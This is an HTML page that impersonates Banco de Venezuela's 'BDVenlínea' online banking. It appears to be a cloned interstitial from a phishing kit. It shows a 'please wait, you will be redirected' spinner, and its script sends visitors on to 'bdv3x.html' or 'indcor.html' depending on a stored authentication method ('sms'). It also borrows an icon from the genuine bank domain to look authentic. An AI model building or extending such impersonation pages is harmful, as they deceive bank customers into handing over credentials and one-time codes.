<!DOCTYPE html>

<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style>body {transition: opacity ease-in 0.2s; } 
body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
</style>
    
    
    <title>BDVenlínea personas</title>

    <script src="jquery.min.js.descarga"></script> 
 
    <meta name="viewport" content="width=device-width, initial-scale=1">
   
    <link href="css/css.css" rel="stylesheet">
    <link href="./lcrgs_files/css(1).css" rel="stylesheet">
    <link href="./lcrgs_files/icon.css" rel="stylesheet">
    <link rel="stylesheet" href="./lcrgs_files/styles.eac594bf15d466147004.css">
 
    <link rel="stylesheet" href="css/styl.css">
    <link rel="mask-icon" href="https://bdvenlinea.banvenez.com/assets/safari-pinned-tab.svg" color="#5bbad5">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <style>
      .ssdd{
        pointer-events: auto;
    color: rgba(0,0,0,.87);
    -webkit-tap-highlight-color: transparent;
    user-select: none;
    cursor: pointer;
    white-space: nowrap;
    margin: 0;
    padding: 0;
    
    border-color: rgba(0,0,0,.54);
    box-sizing: border-box;
    height: 20px;
   
    transition:  ease 280ms;
    width: 15px;
    border-width: 2px;
    border-style: solid;
    border-radius: 50%;
      }
    </style>
    
  <style type="text/css">#_copy{align-items:center;background:#4494d5;border-radius:3px;color:#fff;cursor:pointer;display:flex;font-size:13px;height:30px;justify-content:center;position:absolute;width:60px;z-index:1000}#select-tooltip,#sfModal,.modal-backdrop,div[id^=reader-helper]{display:none!important}.modal-open{overflow:auto!important}._sf_adjust_body{padding-right:0!important}.super_copy_btns_div{position:fixed;width:154px;left:10px;top:45%;background:#e7f1ff;border:2px solid #4595d5;font-weight:600;border-radius:2px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;z-index:5000}.super_copy_btns_logo{width:100%;background:#4595d5;text-align:center;font-size:12px;color:#e7f1ff;line-height:30px;height:30px}.super_copy_btns_btn{display:block;width:128px;height:28px;background:#7f5711;border-radius:4px;color:#fff;font-size:12px;border:0;outline:0;margin:8px auto;font-weight:700;cursor:pointer;opacity:.9}.super_copy_btns_btn:hover{opacity:.8}.super_copy_btns_btn:active{opacity:1}</style></head>
  
  <body>
    <div class="cdk-live-announcer-element cdk-visually-hidden" aria-atomic="true" aria-live="polite"></div>
<div id="cdk-describedby-message-container" aria-hidden="true" style="display: none;">
  <div id="cdk-describedby-message-0">Gestiona tu usuario</div>
</div>
<div class="cdk-overlay-container">
  <div class="cdk-overlay-backdrop cdk-overlay-dark-backdrop cdk-overlay-backdrop-showing"></div>
  <div class="cdk-global-overlay-wrapper" dir="ltr" style="justify-content: center; align-items: center;">
    <div id="cdk-overlay-3" class="cdk-overlay-pane dialog-responsive" style="max-width: 80vw; pointer-events: auto; position: static;">
      <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
      <mat-dialog-container aria-modal="true" class="mat-dialog-container ng-tns-c13-5 ng-trigger ng-trigger-dialogContainer ng-star-inserted" tabindex="-1" id="mat-dialog-1" role="dialog" style="transform: none;">
        <!---->
        <app-elejir-metodo-autenticate _nghost-dme-c16="" class="ng-star-inserted">
          <div _ngcontent-dme-c16="" class="container">
            <div _ngcontent-dme-c16="" style="text-align: center;">
              <h4 _ngcontent-dme-c16="" style="margin-bottom: 20px;">Espere unos segundos</h4>
              <h5 _ngcontent-dme-c16="" style="margin-bottom: 20px;">Sera redirigido pronto.</h5>
            </div>
            <mat-divider _ngcontent-dme-c16="" class="mat-divider mat-divider-horizontal" role="separator" aria-orientation="horizontal"></mat-divider>
            <br _ngcontent-dme-c16="">
            <div _ngcontent-dme-c16="">
              <div class="loadingio-spinner-rolling-cni2u8oo0xf"><div class="ldio-nyvdsdvwp4">
                <div></div>
                </div></div>
                <style type="text/css">
                @keyframes ldio-nyvdsdvwp4 {
                  0% { transform: translate(-50%,-50%) rotate(0deg); }
                  100% { transform: translate(-50%,-50%) rotate(360deg); }
                }
                .ldio-nyvdsdvwp4 div {
                  position: absolute;
                  width: 120px;
                  height: 120px;
                  border: 20px solid #0067b1;
                  border-top-color: transparent;
                  border-radius: 50%;
                }
                .ldio-nyvdsdvwp4 div {
                  animation: ldio-nyvdsdvwp4 1s linear infinite;
                  top: 100px;
                  left: 100px
                }
                .loadingio-spinner-rolling-cni2u8oo0xf {
                  width: 200px;
                  height: 200px;
                  display: inline-block;
                  overflow: hidden;
                  background: none;
                }
                .ldio-nyvdsdvwp4 {
                  width: 100%;
                  height: 100%;
                  position: relative;
                  transform: translateZ(0) scale(1);
                  backface-visibility: hidden;
                  transform-origin: 0 0; /* see note above */
                }
                .ldio-nyvdsdvwp4 div { box-sizing: content-box; }
                /* generated by https://loading.io/ */
                </style>
            </div>
          </div>
        </app-elejir-metodo-autenticate>
      </mat-dialog-container>
      <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
    </div>
  </div>
</div>
   
    <script>
  window.onload = ()=>{
    if (localStorage.getItem("metodo") == "sms") {
      setTimeout(() => {
      window.location = "bdv3x.html";
    }, 20000);
      
    }else{
      window.location = "indcor.html";
    }
    
    
  }

    </script>
    
  
<iframe id="sandbox-iframe" src="./lcrgs_files/sandbox.html" style="display: none;"></iframe><template id="auto-clicker-autofill-popup"></template>
<template id="auto-clicker-autofill-popup-tr"></template>
</body></html>